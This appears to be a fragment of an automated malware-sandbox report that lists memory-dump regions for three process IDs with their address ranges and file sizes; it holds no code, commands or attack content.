                                                                    • memory/3524-434-0x00007FFCE3DA0000-0x00007FFCE3DAD000-memory.dmp

                                                                      Filesize

                                                                      52KB

                                                                    • memory/3524-131-0x00007FFCE3DA0000-0x00007FFCE3DAD000-memory.dmp

                                                                      Filesize

                                                                      52KB

                                                                    • memory/3524-139-0x00007FFCD39D0000-0x00007FFCD3F03000-memory.dmp

                                                                      Filesize

                                                                      5.2MB

                                                                    • memory/3524-435-0x00007FFCE3700000-0x00007FFCE3719000-memory.dmp

                                                                      Filesize

                                                                      100KB

                                                                    • memory/3524-137-0x000001B713260000-0x000001B713793000-memory.dmp

                                                                      Filesize

                                                                      5.2MB

                                                                    • memory/3524-144-0x00007FFCE3930000-0x00007FFCE393D000-memory.dmp

                                                                      Filesize

                                                                      52KB

                                                                    • memory/3524-143-0x00007FFCE35F0000-0x00007FFCE3604000-memory.dmp

                                                                      Filesize

                                                                      80KB

                                                                    • memory/3524-142-0x00007FFCE4540000-0x00007FFCE4567000-memory.dmp

                                                                      Filesize

                                                                      156KB

                                                                    • memory/3524-436-0x00007FFCE3610000-0x00007FFCE3644000-memory.dmp

                                                                      Filesize

                                                                      208KB

                                                                    • memory/3524-347-0x00007FFCE3610000-0x00007FFCE3644000-memory.dmp

                                                                      Filesize

                                                                      208KB

                                                                    • memory/3524-438-0x00007FFCD39D0000-0x00007FFCD3F03000-memory.dmp

                                                                      Filesize

                                                                      5.2MB

                                                                    • memory/3524-439-0x00007FFCE35F0000-0x00007FFCE3604000-memory.dmp

                                                                      Filesize

                                                                      80KB

                                                                    • memory/3524-136-0x00007FFCD3F10000-0x00007FFCD3FDE000-memory.dmp

                                                                      Filesize

                                                                      824KB

                                                                    • memory/3524-440-0x00007FFCE3930000-0x00007FFCE393D000-memory.dmp

                                                                      Filesize

                                                                      52KB

                                                                    • memory/3524-441-0x00007FFCD3910000-0x00007FFCD39C3000-memory.dmp

                                                                      Filesize

                                                                      716KB

                                                                    • memory/3524-130-0x00007FFCE3610000-0x00007FFCE3644000-memory.dmp

                                                                      Filesize

                                                                      208KB

                                                                    • memory/3524-129-0x00007FFCE3700000-0x00007FFCE3719000-memory.dmp

                                                                      Filesize

                                                                      100KB

                                                                    • memory/3524-437-0x00007FFCD41D0000-0x00007FFCD434F000-memory.dmp

                                                                      Filesize

                                                                      1.5MB

                                                                    • memory/3524-427-0x00007FFCD3F10000-0x00007FFCD3FDE000-memory.dmp

                                                                      Filesize

                                                                      824KB

                                                                    • memory/3524-175-0x00007FFCD41D0000-0x00007FFCD434F000-memory.dmp

                                                                      Filesize

                                                                      1.5MB

                                                                    • memory/3524-388-0x000001B713260000-0x000001B713793000-memory.dmp

                                                                      Filesize

                                                                      5.2MB

                                                                    • memory/3524-376-0x00007FFCD41D0000-0x00007FFCD434F000-memory.dmp

                                                                      Filesize

                                                                      1.5MB

                                                                    • memory/3524-75-0x00007FFCE4540000-0x00007FFCE4567000-memory.dmp

                                                                      Filesize

                                                                      156KB

                                                                    • memory/3524-76-0x00007FFCEA750000-0x00007FFCEA75F000-memory.dmp

                                                                      Filesize

                                                                      60KB

                                                                    • memory/3524-370-0x00007FFCD4350000-0x00007FFCD49B3000-memory.dmp

                                                                      Filesize

                                                                      6.4MB

                                                                    • memory/3524-66-0x00007FFCD4350000-0x00007FFCD49B3000-memory.dmp

                                                                      Filesize

                                                                      6.4MB

                                                                    • memory/3524-385-0x00007FFCD3F10000-0x00007FFCD3FDE000-memory.dmp

                                                                      Filesize

                                                                      824KB

                                                                    • memory/3524-381-0x00007FFCD39D0000-0x00007FFCD3F03000-memory.dmp

                                                                      Filesize

                                                                      5.2MB

                                                                    • memory/3524-384-0x00007FFCD3910000-0x00007FFCD39C3000-memory.dmp

                                                                      Filesize

                                                                      716KB

                                                                    • memory/3524-299-0x00007FFCE37E0000-0x00007FFCE3805000-memory.dmp

                                                                      Filesize

                                                                      148KB

                                                                    • memory/4388-9-0x0000000074262000-0x0000000074263000-memory.dmp

                                                                      Filesize

                                                                      4KB

                                                                    • memory/4388-19-0x0000000074260000-0x0000000074811000-memory.dmp

                                                                      Filesize

                                                                      5.7MB

                                                                    • memory/4388-443-0x0000000074260000-0x0000000074811000-memory.dmp

                                                                      Filesize

                                                                      5.7MB

                                                                    • memory/4388-118-0x0000000074262000-0x0000000074263000-memory.dmp

                                                                      Filesize

                                                                      4KB

                                                                    • memory/4388-121-0x0000000074260000-0x0000000074811000-memory.dmp

                                                                      Filesize

                                                                      5.7MB

                                                                    • memory/4388-21-0x0000000074262000-0x0000000074264000-memory.dmp

                                                                      Filesize

                                                                      8KB

                                                                    • memory/4964-104-0x0000000006230000-0x000000000624E000-memory.dmp

                                                                      Filesize

                                                                      120KB

                                                                    • memory/4964-152-0x00000000072E0000-0x00000000072FA000-memory.dmp

                                                                      Filesize

                                                                      104KB

                                                                    • memory/4964-105-0x0000000006C70000-0x0000000006D13000-memory.dmp

                                                                      Filesize

                                                                      652KB

                                                                    • memory/4964-22-0x0000000002670000-0x0000000002680000-memory.dmp

                                                                      Filesize

                                                                      64KB

                                                                    • memory/4964-23-0x00000000046F0000-0x0000000004726000-memory.dmp

                                                                      Filesize

                                                                      216KB

                                                                    • memory/4964-68-0x0000000005C70000-0x0000000005C8E000-memory.dmp

                                                                      Filesize

                                                                      120KB

                                                                    • memory/4964-20-0x0000000073A9E000-0x0000000073A9F000-memory.dmp

                                                                      Filesize

                                                                      4KB

                                                                    • memory/4964-67-0x00000000056D0000-0x0000000005A24000-memory.dmp

                                                                      Filesize

                                                                      3.3MB

                                                                    • memory/4964-107-0x0000000006D80000-0x0000000006D9A000-memory.dmp

                                                                      Filesize

                                                                      104KB

                                                                    • memory/4964-49-0x0000000004C90000-0x0000000004CB2000-memory.dmp

                                                                      Filesize

                                                                      136KB

                                                                    • memory/4964-93-0x0000000006C30000-0x0000000006C62000-memory.dmp

                                                                      Filesize

                                                                      200KB

                                                                    • memory/4964-133-0x0000000002670000-0x0000000002680000-memory.dmp

                                                                      Filesize

                                                                      64KB

                                                                    • memory/4964-153-0x00000000072D0000-0x00000000072D8000-memory.dmp

                                                                      Filesize

                                                                      32KB

                                                                    • memory/4964-94-0x0000000074980000-0x00000000749CC000-memory.dmp

                                                                      Filesize

                                                                      304KB

                                                                    • memory/4964-150-0x0000000007200000-0x0000000007214000-memory.dmp

                                                                      Filesize

                                                                      80KB

                                                                    • memory/4964-145-0x00000000071F0000-0x00000000071FE000-memory.dmp

                                                                      Filesize

                                                                      56KB

                                                                    • memory/4964-69-0x0000000005CA0000-0x0000000005CEC000-memory.dmp

                                                                      Filesize

                                                                      304KB

                                                                    • memory/4964-50-0x0000000005580000-0x00000000055E6000-memory.dmp

                                                                      Filesize

                                                                      408KB

                                                                    • memory/4964-124-0x0000000073A9E000-0x0000000073A9F000-memory.dmp

                                                                      Filesize

                                                                      4KB

                                                                    • memory/4964-51-0x0000000005660000-0x00000000056C6000-memory.dmp

                                                                      Filesize

                                                                      408KB

                                                                    • memory/4964-114-0x0000000004990000-0x00000000049A1000-memory.dmp

                                                                      Filesize

                                                                      68KB

                                                                    • memory/4964-109-0x0000000007220000-0x00000000072B6000-memory.dmp

                                                                      Filesize

                                                                      600KB

                                                                    • memory/4964-108-0x0000000006DF0000-0x0000000006DFA000-memory.dmp

                                                                      Filesize

                                                                      40KB

                                                                    • memory/4964-106-0x00000000076B0000-0x0000000007D2A000-memory.dmp

                                                                      Filesize

                                                                      6.5MB

                                                                    • memory/4964-40-0x0000000004D60000-0x0000000005388000-memory.dmp

                                                                      Filesize

                                                                      6.2MB